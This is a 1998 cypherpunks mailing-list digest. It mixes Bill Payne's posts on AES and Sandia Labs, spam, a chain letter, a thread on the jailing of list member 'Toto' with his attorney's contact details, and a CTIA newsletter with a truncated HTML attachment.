44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 2 Sep 1998 06:12:11 -0700 (PDT)
To: j orlin grabbe <ukcrypto@maillist.ox.ac.uk
Subject: AES and The Game
Message-ID: <35ED42EF.7D85@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday 9/2/98 6:26 AM

J Orlin Grabbe  http://www.aci.net/kalliste/

I'm going to write an article for The Laissez Faire City Times
http://zolatimes.com/

	Black and White Test of Cryptographic Algorithms

I have what I want to write CLEARLY in mind.  

THINKING before DOING works better than the CONVERSE.  But this takes
time, of course.

How much $s would such an article be worth?

We have to keep in mind WHY we are doing all of this.  
Like what Baranyi is doing at http://www.qainfo.se/~lb/crypto_ag.htm

I will write when I take breaks from debugging and documenting digital
FX hardware.
$s, again.  The digital FX was HOPEFULLY very well thought-out and will
work reliably
in the field.

Here are SOME of my references.
---
*AES*
http://www.aci.net/kalliste/cryptnum.htm

http://csrc.nist.gov/encryption/aes/aes_home.htm
http://www.ii.uib.no/~larsr/bc.html
http://www.jya.com/frog-hack.htm
http://csrc.nist.gov/encryption/aes/round1/docs.htm
http://www.jya.com/aes-mail.htm

http://www.softwar.net/hist.html

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htm

                                    HOLLYWOOD (October, 1997) -- London
Records is
                                    pleased to announce the release of
Howard Shore's
                                    original motion picture score to The
Game, starring
                                    Michael Douglas and Sean Penn. 

                           The film is a thriller directed by David
Fincher (Se7en). "The Game" is
                           what begins when a high-powered businessman
named Nicholas Van
                           Orton (Douglas) receives the birthday gift of
a lifetime from his
                           brother he alienated years ago (Penn). What
Nicholas gets is entry
                           into a mysterious new form of entertainment
provided by C.R.S.
                           (Consumer Recreational Services) simply
called "The Game." It
                           proves to be an all-consuming contest with
only one rule: there are
                           no rules. By the time Van Orton realizes he
is in, it is too late to get
                           out. Laced with intrigue, action and danger
beyond belief, The Game
                           ultimately draws to a cataclysmic close,
every step bringing Van
                           Orton nearer to an explosive confrontation
with what threatens him
                           most. 

                           Howard Shore has written a tense and gripping
score. The
                           soundtrack features "White Rabbit" performed
by the legendary
                           Jefferson Airplane. 
http://www.movietunes.com/soundtracks/1997/game/

          The contemplation of things as they are,      
                without error or confusion,      
            without substitution or imposture,      
   is in itself a nobler thing than a whole harvest of invention.      
      
   Francis Bacon       
    
 Stupidity is difficult to underestimate  
   Professor Robert Franklin Wallace - economics

 Don't search for deeper explanations when stupidity will suffice
   Professor Melvin Gordon Davidson - physics






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Wed, 2 Sep 1998 02:34:02 -0700 (PDT)
To: (STUFFED WEDNESDAY SEPTEMBER 2 1998)
Subject: THE HAZARDS OF EXOTIC DANCING/OVER TWO DOZEN FREE JPEGS
Message-ID: <19980902071000.18801.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Great reading, super pictures... You get it all! 

+ 21+ FREE HI-RES JPEGS
+ PAGE 2 'SPREAD' - 'B_E_E_F_Y'
+ THE 10 COMMANDMENTS OF PLEASURE
  BY DR. SUSAN BLOCK PHD
+ EXCLUSIVE: WEB MISTRESS SITE REVIEWS
+ PEANUT BUTTER PECKER
+ 18 FOOT PLONKER POOL MISHAP
+ THUMBNAIL HEAVEN: MORE STUPENDOUS FREE JPEGS
+ TODAY'S SEXY STORY: 'RESTROOM ANTIC'
+ YOUR TRUE SEX SECRETS: MARINE'S MILE HIGH ADVENTURE
+ MORE OF THE BEST WEB SITES EVER REVIEWED IN EUREKA!
+ SEXY SURPRISE THUMBS: A SURPRISE WITH EACH CLICK
+ SUPER HI-RES POSTER PIC: SAVE OR PRINT IT!

       ---->   http://stuffed.net/98/9/2/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/2/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 2 Sep 1998 08:38:29 -0700 (PDT)
To: softwar@softwar.net
Subject: Sandia president C Paul Robinson's August 19, 1998 view graphs
Message-ID: <35ED654B.189@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday 9/2/98 8:34 AM

John Young

I mailed you 20 pages of view graphs for Sandia president C Paul
Robinson's
August 19, 1998 speech

  "Looking to the future:  A more dangerous world is appearing."

Your readers will likely value the opportunity to ATTEMPT to find
out is what on Robinson's and the US government's mind.

Money is at the heart of motivation, of course.

If the US is NOT firing tomahawk missiles SOMEWHERE, then this
is BAD for BUSINESS.  No PR s being written for replacements.

  The Tomahawk cruise missile, acquired when Raytheon bought Hughes
Aircraft from General Motors     Corp. in December for $9.5 billion.
Nearly 300 were fired in the Gulf War at Iraqi missile sites,   command
centers, weapons caches, and other targets.  A new version is guided by
global positioning   satellites, a network of 24 satellites fixed high
above the earth and used for navigation.  

  In addition, a General Accounting Office report released last year
said that 
  manufacturers' claims for the Tomahawk, Paveway, and other weapons
were overstated.  
  Boston Globe, Feb. 18, 1998 

   Bill Clinton's $100 Million Crusade Against Ken Starr

                                        by Charles R. Smith

      August was an expensive month for the U.S. taxpayer. For example,
Bill Clinton shot $100            million on August 20, 1998 at
"terrorist" sites in Sudan and Afghanistan. The 79 Tomahawk          
cruise missiles signaled a new "war" that Bill Clinton decided to
declare on terrorism and not       to be confused with the $100 million
White House "war" on Ken Starr. 

      The cost? Tomahawks cost about $1.4 to $2.1 million each,
depending on the model. Moreover,       the Tomahawk price tag does not
reflect the price of conducting the strike such as logistics,      
planning, communications, ship, fuel, and sailor time. If one were to
add in these figures -       the actual strike cost about $1 billion.
...

      The Tomahawk strike also shows the Clinton administration is as
number minded in its war as       the Johnson administration was in
Vietnam. Million dollar missiles on remote Afghan camps are       likely
to be no more successful than B-52s against the Ho Chi Minh trail. There
is an       over-emphasis of "damage assessment" with no regard to
whether the bodies were enemy soldiers       or innocent bystanders.
There is no clear objective and no clear plan for victory. 

Lesson one learns at Sandia when one GETS THE RIGHT CLEARANCES is that
US government creates
its own business opportunities.

  Embassy Bombings 
 
                   Pakistan Gears to Midwife "Get Osama" Operation 
 
                                    Will the U.S. Bomb Afghanistan? 
 
      KARACHI: The arrest and the subsequent statement and evidence
provided by a Palestinian             arrested in Karachi, soon after
his arrival from Nairobi, has pushed US investigators close to      
declare the Afghanistan-based Saudi millionaire Osama Bin Laden as the
man behind the       devastating bombings that killed more than 250
people in and around US embassies in Kenya and       Tanzania on August
7, officials 
      disclosed here and in interviews from Islamabad.  ...

  The News International Pakistan, August 17, 1998 

was SIMPLY GREAT for Sandia Labs business interests as evidenced by
Robinson's August 19th view graphs.

 Osama Calls on Ummah to Continue Jehad 
 
    Denies Involvement in Embassy Bombings 
 
      PESHAWAR: Saudi dissident Osama Bin Laden for the first time
on       
      Thursday denied his involvement in the August 7 bombings at the
US      
      embassies in Kenya and Tanzania.
      The 42-year-old Bin Laden contacted this correspondent on         
      satellite phone at 9:00 pm on Thursday to convey his statement     
      through another Islamic leader Dr Ayman Al-Zawahiri, head
of         
      Egyptian Islamic Jehad organisation which was held responsible
for     
      the murder of Egypt's president Anwar Sadaat.  ...
    
    The News International Pakistan, August 21, 1998

Sandia supervisor James Gosler 

  When Payne balked, his supervisor said Payne "did not choose his
jobs.   
  Rather, Sandia assigns duties to" him. 

http://www.jya.com/whp1.htm

told us, 

  "There are some things the US government does that are SO SECRET they
  can't be CLASSIFIED."

Post away  ... and let's continue to hope for settlement of this
unfortunate matter.

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htm

bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Tue, 1 Sep 1998 02:08:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: BEWARE of SnakeOil (tm)
Message-ID: <3.0.3.32.19980902103231.006af730@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain


>> The subpoena Booher received also ordered him to bring to the courthouse
the
>> source code for his product, suggesting the government wants to reverse
>> engineer it.
>

The writer of this article shows an astonishing lack of computer knowledge.
If they get the source code then there is no need to reverse engineer!
Discount anything technical this writer says since he/she is clueless!

Give 'em a word processor and they think they're journalists...

Albert P. Franco, II







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s9812127@postino.up.ac.za
Date: Wed, 2 Sep 1998 01:49:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: STRESS relief
Message-ID: <E0zE8dG-0003PC-00@postino.up.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


  
> > This is guaranteed to alleviate pressure in the 
> > boomboom area of your head,
> >
> > HOLD THE DOWN ARROW AND KEEP GOING 
> >
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *     hi people
> > *     hi people
> > *       hi people
> > *         hi people
> > *           hi people
> > *             hi people
> > *              hi people
> > *              hi people
> > *             hi people
> > *            hi people
> > *          hi people
> > *         hi people
> > *       hi people
> > *     hi people
> > *     hi people
> > *      hi people
> > *       hi people
> > *         hi people
> > *           hi people
> > *             hi people
> > *              hi people
> > *              hi people
> > *             hi people
> > *            hi people
> > *          hi people
> > *         hi people
> > *       hi people
> > *      hi people
> > *     hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi peopl e
> > *    hi peopl   e
> > *    hi peopl    e
> > *    hi peop l    e
> > *    hi peop  l    e
> > *    hi peop   l    e
> > *    hi peop    l    e
> > *    hi peo p    l    e
> > *    hi peo  p    l    e
> > *    hi peo   p    l    e
> > *    hi peo    p    l    e
> > *    hi pe o    p    l    e
> > *    hi pe  o    p    l    e
> > *    hi pe   o    p    l    e
> > *    hi pe    o    p    l    e
> > *    hi p e    o    p    l    e
> > *    hi p  e    o    p    l    e 
> > *    hi p   e    o    p    l    e
> > *    hi p    e    o    p    l    e 
> > *    hi  p    e    o    p    l    e
> > *    hi   p    e    o    p    l    e 
> > *    hi    p    e    o    p    l    e
> > *    h i    p    e    o    p    l    e 
> > *    h  i    p    e    o    p    l    e
> > *    h   i    p    e    o    p    l    e 
> > *    h    i    p    e    o    p    l    e
> > *     h    i    p    e    o    p    l    e 
> > *      h    i    p    e    o    p    l    e
> > *       h    i    p    e    o    p    l    e 
> > *        h    i    p    e    o    p    l    e 
> > *         h    i    p    e    o    p    l   e 
> > *          h    i    p    e    o    p    l  e 
> > *           h    i    p    e    o    p    l e 
> > *            h    i    p    e    o    p    le 
> > *             h    i    p    e    o    p   le 
> > *              h    i    p    e    o    p  le 
> > *               h    i    p    e    o    p le 
> > *                h    i    p    e    o    ple 
> > *                 h    i    p    e    o   ple 
> > *                  h    i    p    e    o  ple 
> > *                   h    i    p    e    o ple 
> > *                    h    i    p    e    ople 
> > *                     h    i    p    e   ople 
> > *                      h    i    p    e  ople 
> > *                       h    i    p    e ople 
> > *                        h    i    p    eople 
> > *                         h    i    p   eople 
> > *                          h    i    p  eople 
> > *                           h    i    p eople 
> > *                            h    i    people 
> > *                             h    i   people 
> > *                              h    i  people 
> > *                               h    i people 
> > *                                h   i people 
> > *                                 h  i people 
> > *                                  h i people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people
> > *                                  hi p e ople 
> > *                                 hi p  e  ople
> > *                                hi p   e   ople 
> > *                               hi p    e    ople 
> > *                              hi p     e    ople
> > *                             hi p      e     ople 
> > *                            hi p       e      ople
> > *                           hi p        e       ople 
> > *                          hi p         e        ople
> > *                         hi p          e         ople 
> > *                         hi p         e          ople 
> > *                         hi p        e           ople 
> > *                         hi p       e            ople 
> > *                         hi p        e           ople 
> > *                         hi p         e          ople 
> > *                         hi p          e         ople 
> > *                         hi p           e        ople 
> > *                         hi p            e       ople 
> > *                         hi p             e      ople 
> > *                         hi p            e       ople 
> > *                         hi p           e        ople 
> > *                         hi p          e         ople 
> > *                          hi p         e        ople 
> > *                           hi p        e       ople
> > *                            hi p       e      ople 
> > *                             hi p      e     ople 
> > *                              hi p     e    ople
> > *                               hi p    e    ople 
> > *                                hi p   e   ople 
> > *                                 hi p  e  ople
> > *                                  hi p e ople 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                  hi people
> > *                                 hi people 
> > *                                hi people 
> > *                               hi people
> > *                              hi people 
> > *                             hi people 
> > *                            hi people
> > *                           hi people 
> > *                          hi people 
> > *                         hi people
> > *                        hi people 
> > *                       hi people 
> > *                      hi people
> > *                     hi people
> > *                    hi people
> > *                   hi people
> > *                  hi people
> > *                 hi people
> > *                hi people
> > *               hi people
> > *              hi people
> > *             hi people
> > *            hi people
> > *           hi people
> > *          hi people
> > *         hi people
> > *        hi people
> > *       hi people
> > *      hi people
> > *     hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi peopl e
> > *    hi peopl  e
> > *    hi peopl   e
> > *    hi peopl    e
> > *    hi peop l    e
> > *    hi peop  l    e
> > *    hi peop   l    e
> > *    hi peop    l    e
> > *    hi peo p    l    e
> > *    hi peo  p    l    e
> > *    hi peo   p    l    e
> > *    hi peo    p    l    e
> > *    hi pe o    p    l    e
> > *    hi pe  o    p    l    e
> > *    hi pe   o    p    l    e
> > *    hi pe    o    p    l    e
> > *    hi p e    o    p    l    e
> > *    hi p  e    o    p    l    e 
> > *    hi p   e    o    p    l    e
> > *    hi p    e    o    p    l    e 
> > *    hi  p    e    o    p    l    e
> > *    hi   p    e    o    p    l    e 
> > *    hi    p    e    o    p    l    e
> > *    h i    p    e    o    p    l    e 
> > *    h  i    p    e    o    p    l    e
> > *    h   i    p    e    o    p    l    e 
> > *    h    i    p    e    o    p    l    e
> > *     h    i    p    e    o    p    l    e 
> > *      h    i    p    e    o    p    l    e
> > *       h    i    p    e    o    p    l    e 
> > *        h    i    p    e    o    p    l    e 
> > *         h    i    p    e    o    p    l   e 
> > *          h    i    p    e    o    p    l  e 
> > *           h    i    p    e    o    p    l e 
> > *            h    i    p    e    o    p    le 
> > *             h    i    p    e    o    p   le 
> > *              h    i    p    e    o    p  le 
> > *               h    i    p    e    o    p le 
> > *                h    i    p    e    o    ple 
> > *                 h    i    p    e    o   ple 
> > *                  h    i    p    e    o  ple 
> > *                   h    i    p    e    o ple 
> > *                    h    i    p    e    ople 
> > *                     h    i    p    e   ople 
> > *                      h    i    p    e  ople 
> > *                       h    i    p    e ople 
> > *                        h    i    p    eople 
> > *                         h    i    p   eople 
> > *                          h    i    p  eople 
> > *                           h    i    p eople 
> > *                            h    i    people 
> > *                             h    i   people 
> > *                              h    i  people 
> > *                               h    i people 
> > *                                h   i people 
> > *                                 h  i people 
> > *                                  h i people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people
> > *                                  hi p e ople 
> > *                                 hi p  e  ople
> > *                                hi p   e   ople 
> > *                               hi p    e    ople 
> > *                              hi p     e    ople
> > *                             hi p      e     ople 
> > *                            hi p       e      ople
> > *                           hi p        e       ople 
> > *                          hi p         e        ople
> > *                         hi p          e         ople 
> > *                         hi p         e          ople 
> > *                         hi p        e           ople 
> > *                         hi p       e            ople 
> > *                         hi p        e           ople 
> > *                         hi p         e          ople 
> > *                         hi p          e         ople 
> > *                         hi p           e        ople 
> > *                         hi p            e       ople 
> > *                         hi p             e      ople 
> > *                         hi p            e       ople 
> > *                         hi p           e        ople 
> > *                         hi p          e         ople 
> > *                          hi p         e        ople 
> > *                           hi p        e      ople
> > *                            hi p       e     ople 
> > *                             hi p      e     ople 
> > *                              hi p     e    ople 
> > *                               hi p    e    ople 
> > *                                hi p   e   ople
> > *                                 hi p  e  ople 
> > *                                  hi p e ople 
> > *                                   hi people
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                   hi people 
> > *                                  hi people 
> > *                                 hi people
> > *                                hi people 
> > *                               hi people 
> > *                              hi people
> > *                             hi people 
> > *                            hi people 
> > *                           hi people
> > *                          hi people 
> > *                         hi people 
> > *                        hi people
> > *                       hi people 
> > *                      hi people 
> > *                     hi people
> 
> > *                    hi people
> > *                   hi people
> > *                  hi people
> > *                 hi people
> > *                hi people
> > *               hi people
> > *              hi people
> > *             hi people
> > *            hi people
> > *           hi people
> > *          hi people
> > *         hi people
> > *        hi people
> > *       hi people
> > *      hi people
> > *     hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    hi people
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *     aint this cool
> > *      aint this cool
> > *       aint this cool
> > *        aint this cool
> > *       a int this cool
> > *      a  int this cool
> > *     a   int this cool
> > *    a    int this cool
> > *    a   i nt this cool
> > *    a  i  nt this cool
> > *    a i   nt this cool
> > *    ai    nt this cool
> > *    ai   n t this cool
> > *    ai  n  t this cool
> > *    ai n   t this cool
> > *    ain   t  this cool
> > *    ain  t   this cool
> > *    ain t    this cool
> > *    aint     this cool
> > *    aint    t his cool
> > *    aint   t  his cool
> > *    aint  t   his cool
> > *    aint t   h is cool
> > *    aint t  h  is cool
> > *    aint t h   is cool
> > *    aint th   i s cool
> > *    aint th  i  s cool
> > *    aint th i   s cool
> > *    aint thi   s  cool
> > *    aint thi  s   cool
> > *    aint thi s    cool
> > *    aint this    c ool
> > *    aint this   c  ool
> > *    aint this  c   ool
> > *    aint this c   o ol
> > *    aint this c  o  ol
> > *    aint this c o   ol
> > *    aint this co   o l
> > *    aint this co  o  l
> > *    aint this co o   l
> > *    aint this coo   l
> > *    aint this coo  l
> > *    aint this coo l
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *    aint this cool
> > *     aint this cool
> > *      aint this cool
> > *       aint this cool
> > *        aint this cool
> > *         aint this cool
> > *          aint this cool
> > *           aint this cool
> > *            aint this cool
> > *             aint this cool
> > *              aint this cool
> > *               aint this cool
> > *                aint this cool
> > *                 aint this cool 
> > *                  aint this cool
> > *                   aint this cool 
> > *                    aint this cool
> > *                     aint this cool 
> > *                      aint this cool
> > *                       aint this cool 
> > *                        aint this cool
> > *                         aint this cool 
> > *                          aint this cool
> > *                           aint this cool 
> > *                            aint this cool 
> > *                            STOP SCROLLING 
> > *                         STOP SCROLLING
> > *                       STOP SCROLLING 
> > *                     STOP SCROLLING
> > *                   STOP SCROLLING 
> > *                 STOP SCROLLING
> > *               STOP SCROLLING
> > *             STOP SCROLLING
> > *           STOP SCROLLING
> > *         STOP SCROLLING
> > *       STOP SCROLLING
> > *     STOP SCROLLING
> > *   STOP SCROLLING
> > *  STOP SCROLLING
> > *  STOP SCROLLING
> > *  STOP SCROLLING
> > *  STOP SCROLLING
> > *  STOP SCROLLING
> > *  STOP SCROLLING
> > *  STOP SCROLLING
> >
> > If you liked this, then send it on to 10 other 
> > people in the next 30
> > minutes and help relieve global stress! 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alia Johnson <lodi@well.com>
Date: Wed, 2 Sep 1998 11:03:13 -0700 (PDT)
To: John Young <jy@jya.com>
Subject: Re: toto
In-Reply-To: <Version.32.19980902122927.0102f9e0@pop.pipeline.com>
Message-ID: <Pine.GSO.3.96.980902105325.28905A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you. CJ's inmate number at CCA is 05 98 7196. The phone there is 520
868 3668. Of course you can't call him, and mail delivered to the prison
ten days ago has not reached him.NEW INFO: I JUST CALLED THE ATTORNEY'S
OFICE AND HIS SECRETARY INFORMS ME THAT THE HEARING HAS BEEN CANCELLED AND
THE JUDGE HAS ORDERED HIM MOVED TO 'AN APPROPRIATE PSYCHIATRIC FACILITY'
FOR EVALUATION. THE RUMOR IS THAT THIS IS THE ONE IN SPRINGFIELD,
MISSOURI. CJ HAS BEEN INFORMED OF THIS, AND THERE IS ALSO A RUMOR THAT HE
IS IN ISOLATION AND NOT ALLOWED TO MAKE PHONE CALLS. I WILL KEEP YOU
INFORMED OF FURTHER DEVELOPMENTS.
ALIA

On Wed, 2 Sep 1998, John Young wrote:

> Alia,
> 
> We've put the court docket on Toto's case at:
> 
>    http://jya.com/cej-bust.htm
> 
> Also, we've left an inquiry at his attorney's
> office (who's in LA today) for more information:
> 
>   John G Bogart, Esq
>   70 W Franklin St
>   Tucson, AZ 85701
>   (520) 624-8196
> 
> Let us know what you learn at the court hearing
> if you attend and give Toto a hug and kiss (and a 
> handcuff key). Tell him to call me if he can and wants
> to:
> 
>    (212) 873-8700
> 
> John Young
> 
> -----
> 
> To cpunks: I seemed to have misplaced Toto's Cafe
> Gulag post. I'd appreciate a copy or a pointer. Thanks.
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <Andrew.Loewenstern@wdr.com>
Date: Wed, 2 Sep 1998 09:24:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: e-mail security at the Onion
Message-ID: <9809021625.AA01873@ch1d524iwk>
MIME-Version: 1.0
Content-Type: text/plain


"What are people doing to proctect their messages from prying eyes?"

Find Out!

http://www.theonion.com/onion3405/infograph_3405.html


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 2 Sep 1998 11:54:41 -0700 (PDT)
To: tleininger@moraine.tec.wi.us
Subject: Re: Cypherpunks HyperArchive
In-Reply-To: <86256673.00601940.00@moraine.tec.wi.us>
Message-ID: <35ED94D6.7416@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain


tleininger@moraine.tec.wi.us wrote:
> 
> I would appreciate it if you could help. For some time now I've read the
> Cypherpunks HyperArchive
> (http://infinity.nus.sg/cypherpunks/), and now I can't get it. I don't
> believe it's being blocked on my end - whats up?
> Thank's for your time. TLL

It has been moved. 

http://www.inet-one.com/cypherpunks/

I still read it because even though I have subscribed to the list I do
not get all of the mail that appears in the hyperarchive. The list so
far seems to be only about 40 e-mails each day. Lots of it is easily
spotted junk mail.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tleininger@moraine.tec.wi.us
Date: Wed, 2 Sep 1998 10:30:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cypherpunks HyperArchive
Message-ID: <86256673.00601940.00@moraine.tec.wi.us>
MIME-Version: 1.0
Content-Type: text/plain


I would appreciate it if you could help. For some time now I've read the
Cypherpunks HyperArchive
(http://infinity.nus.sg/cypherpunks/), and now I can't get it. I don't
believe it's being blocked on my end - whats up?
Thank's for your time. TLL






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jy@jya.com>
Date: Wed, 2 Sep 1998 09:59:16 -0700 (PDT)
To: Alia Johnson <lodi@well.com>
Subject: Re: toto
In-Reply-To: <Pine.GSO.3.96.980901191119.16412A-100000@well.com>
Message-ID: <Version.32.19980902122927.0102f9e0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Alia,

We've put the court docket on Toto's case at:

   http://jya.com/cej-bust.htm

Also, we've left an inquiry at his attorney's
office (who's in LA today) for more information:

  John G Bogart, Esq
  70 W Franklin St
  Tucson, AZ 85701
  (520) 624-8196

Let us know what you learn at the court hearing
if you attend and give Toto a hug and kiss (and a 
handcuff key). Tell him to call me if he can and wants
to:

   (212) 873-8700

John Young

-----

To cpunks: I seemed to have misplaced Toto's Cafe
Gulag post. I'd appreciate a copy or a pointer. Thanks.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "joe harlin" <joeharlin@hotmail.com>
Date: Wed, 2 Sep 1998 13:06:48 -0700 (PDT)
To: lodi@well.com
Subject: Re: toto
Message-ID: <19980902200614.28540.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Alia,

I am a little confused.

What exactly did you brother do and what would you like us to do?

All the best.
Joe



>Date: Wed, 2 Sep 1998 11:01:10 -0700 (PDT)
>From: Alia Johnson <lodi@well.com>
>To: John Young <jy@jya.com>
>cc: cypherpunks@toad.com
>Subject: Re: toto
>
>Thank you. CJ's inmate number at CCA is 05 98 7196. The phone there is 
520
>868 3668. Of course you can't call him, and mail delivered to the 
prison
>ten days ago has not reached him.NEW INFO: I JUST CALLED THE ATTORNEY'S
>OFICE AND HIS SECRETARY INFORMS ME THAT THE HEARING HAS BEEN CANCELLED 
AND
>THE JUDGE HAS ORDERED HIM MOVED TO 'AN APPROPRIATE PSYCHIATRIC 
FACILITY'
>FOR EVALUATION. THE RUMOR IS THAT THIS IS THE ONE IN SPRINGFIELD,
>MISSOURI. CJ HAS BEEN INFORMED OF THIS, AND THERE IS ALSO A RUMOR THAT 
HE
>IS IN ISOLATION AND NOT ALLOWED TO MAKE PHONE CALLS. I WILL KEEP YOU
>INFORMED OF FURTHER DEVELOPMENTS.
>ALIA
>
>On Wed, 2 Sep 1998, John Young wrote:
>
>> Alia,
>> 
>> We've put the court docket on Toto's case at:
>> 
>>    http://jya.com/cej-bust.htm
>> 
>> Also, we've left an inquiry at his attorney's
>> office (who's in LA today) for more information:
>> 
>>   John G Bogart, Esq
>>   70 W Franklin St
>>   Tucson, AZ 85701
>>   (520) 624-8196
>> 
>> Let us know what you learn at the court hearing
>> if you attend and give Toto a hug and kiss (and a 
>> handcuff key). Tell him to call me if he can and wants
>> to:
>> 
>>    (212) 873-8700
>> 
>> John Young
>> 
>> -----
>> 
>> To cpunks: I seemed to have misplaced Toto's Cafe
>> Gulag post. I'd appreciate a copy or a pointer. Thanks.
>> 
>> 
>> 
>> 
>> 
>
>


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 2 Sep 1998 13:14:42 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 2, 1998
Message-ID: <199809022011.PAA21866@revnet3.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713804.multipart/mixed"

--Boundary..3996.1071713804.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

One of your customers just made 
three really long distance calls.....simultaneously.
Have you deployed authentication?
CTIA's Wireless Security '98 - It's Just Smart Business.
Orlando, Florida  November 9 - 11, 1998 
http://www.wow-com.com/professional 
===========================================
 




--Boundary..3996.1071713804.multipart/mixed
Content-Type: application/octet-stream; name="bin00012.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00012.bin"
Content-Description: "_CTIA_Daily_News_19980902a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxjZW50ZXI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9wcm9mZXNzaW9uYWwvY29udmVudGlvbi93c2VjdXJpdHkvaW5k
ZXguY2ZtIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFn
